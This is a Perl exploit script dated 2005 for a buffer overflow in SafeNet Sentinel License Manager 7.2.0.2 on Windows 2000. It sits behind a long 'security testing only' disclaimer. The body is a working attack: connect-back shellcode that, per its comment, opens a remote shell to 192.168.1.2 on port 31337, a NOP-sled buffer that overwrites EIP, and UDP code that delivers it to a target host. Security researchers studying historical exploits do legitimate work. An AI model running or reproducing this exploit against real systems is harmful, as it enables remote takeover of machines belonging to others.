#!/usr/bin/perl #ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO # # ************************************************** !!! WARNING !!! *********************************************************** # * FOR SECURITY TESTiNG ONLY! * # ****************************************************************************************************************************** # * By using this code you agree that I makes no warranties or representations, express or implied, about the * # * accuracy, timeliness or completeness of this, including without limitations the implied warranties of * # * merchantability and fitness for a particular purpose. * # * I makes NO Warranty of non-infringement. This code may contain technical inaccuracies or typographical errors. * # * This code can never be copyrighted or owned by any commercial company, under no circumstances what so ever. * # * but can be use for as long the developer, are giving explicit approval of the usage, and the user understand * # * and approve of all the parts written in this notice. * # * This program may NOT be used by any Danish company, unless explicit written permission from the developer . * # * Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect * # * or punitive damages arising out of access to, inability to access, or any use of the content of this code, * # * including without limitation any PC, other equipment or other property, even if I am Expressly advised of * # * the possibility of such damages. I DO NOT encourage criminal activities. If you use this code or commit * # * criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, * # * and/or reading anything from this code you are considered to have accepted the terms and conditions and have read * # * this disclaimer. Once again this code is for penetration testing purposes only. And once again, DO NOT DISTRIBUTE! * # ****************************************************************************************************************************** # # NOTICE: # Flaw in Sentinel License Manager can result in Code Execution # # Affected Software: # SafeNet Sentinel License Manager 7.2.0.2 # # Operating system : # - Windows 2000 Server SP4 <--- Attack successfully # # The following error will end up in the event viewer: # ------------------------------------------------------------------------ # Event Type: Error # Event Source: Service Control Manager # Event Category: None # Event ID: 7031 # Description: # The SentinelLM service terminated unexpectedly. # ------------------------------------------------------------------------ # use IO::Socket; use Getopt::Long; $port = "5093"; $target = "192.168.1.4"; # Shellcode 281 connect back 192.168.1.2 31337 $egg = join ("", "\x33\xc0\x33\xc9\xb1\x58\x2b\xe1\x8b\xfc\xf3\xaa\x8b\xec\x66\xb8", "\x6c\x6c\x66\x50\xb8\x33\x32\x2e\x64\x50\xb8\x77\x73\x32\x5f\x50", "\x8b\xc4\x50\xb8\xd5\x01\x59\x7c\xff\xd0\x8b\xe5\x89\x04\x24\x66", "\xbb\x74\x41\x66\x53\xbb\x6f\x63\x6b\x65\x53\xbb\x57\x53\x41\x53", "\x53\x8b\xdc\x53\x50\xbb\x5f\x0c\x59\x7c\xff\xd3\x8b\xe5\x33\xdb", "\x53\x53\x53\xb3\x06\x53\xb3\x01\x53\x43\x53\xff\xd0\x8b\xe5\x33", "\xdb\xb3\x14\x03\xe3\xb3\x44\x89\x1c\x24\xb3\x2c\x03\xe3\x33\xc9", "\xfe\xc5\x89\x0c\x24\xb3\x0c\x03\xe3\x89\x04\x24\x44\x44\x44\x44", "\x89\x04\x24\x44\x44\x44\x44\x89\x04\x24\x8b\xe5\x03\xe3\x68\xc0", "\xa8\x01\x02\x66\xbb\x7a\x69\x90\x90\x66\x53\x33\xdb\x43\x43\x66", "\x53\x8b\xe5\x8b\x1c\x24\x89\x04\x24\x66\xb8\x74\x74\x32\xe4\x66", "\x50\x66\xb8\x65\x63\x66\x50\xb8\x63\x6f\x6e\x6e\x50\x8b\xc4\x50", "\x53\xbb\x5f\x0c\x59\x7c\xff\xd3\x8b\xe5\x33\xdb\xb3\x10\x53\x45", "\x45\x45\x45\x55\x4d\x4d\x4d\x4d\x8b\xdd\xff\x33\xff\xd0\x8b\xe5", "\x66\xb8\x65\x65\x32\xe4\x66\x50\x66\xb8\x65\x78\x66\x50\xb8\x63", "\x6d\x64\x2e\x50\x8b\xc4\x8b\xcd\x51\x33\xdb\xb3\x14\x03\xcb\x51", "\x33\xdb\x53\x53\x53\x51\x53\x53\x50\x53\xb8\xa8\x4f\x59\x7c\xff", "\xd0\x50\xb8\x72\x69\x59\x7c\xff\xd0"); $buf = "\x90" x 364; $buf .= $egg; $buf .= "\x90" x 191; $buf .= pack("l",0x7C571C73); # Overwritting the EIP with a CALL EBX (KERNEL32.DLL) $buf .= "\x90" x 2200; GetOptions( "target=s" => \$target, "port=i" => \$port, "help|?" => sub { print "\n" x 90; print "\t #################################################\n"; print "\t # SafeNet Sentinel License Manager 7.2.0.2 #\n"; print "\t # ************* !!! WARNING !!! ************ #\n"; print "\t # ************ DO NOT DISTRIBUTE *********** #\n"; print "\t # ** FOR PRIVATE AND EDUCATIONAL USE ONLY! * #\n"; print "\t # ****************************************** #\n"; print "\t # (c)2005 by Dennis Rand #\n"; print "\t #################################################\n"; print "\n\t -target\t\t eg.: 127.0.0.1\n"; print "\t -port\t\t\t eg.: 5093\n\n"; print "\tUsage eg.: sentinelLM.pl -t 127.0.0.1 -p 5093\n"; exit; } ); $error .= "Error: You must specify a target host\n" if ((!$target)); $error .= "Error: You must specify a port number\n" if ((!$port)); if ($error) { print "Try SentinelLM.pl -help or -?' for more information.\n$error\n" ; exit; } if ($target) { print "\n\n\nSafeNet Sentinel License Manager 7.2.0.2 Buffer Overflow - $target on port $port ..."; print "\n\n"; $host = $target; attack(); }; sub attack { print "[*] Shellcode Size: ".length($egg)." bytes\n"; print "[*] Preparing Exploit Buffer......Ready\n"; print "[*] Connecting To Target"; $| = 1; my $connection = IO::Socket::INET->new(Proto =>"udp", PeerAddr =>$target, PeerPort =>$port) || die ". The server located at $target port $port failed to respond \n"; print " - DONE\n"; print "[*] Sending Exploit"; print $connection "$buf"; close $connection; print " - DONE\n"; print "[*] Exploit Delivered at target - Total byte size ".length($buf)."\n\n"; exit; };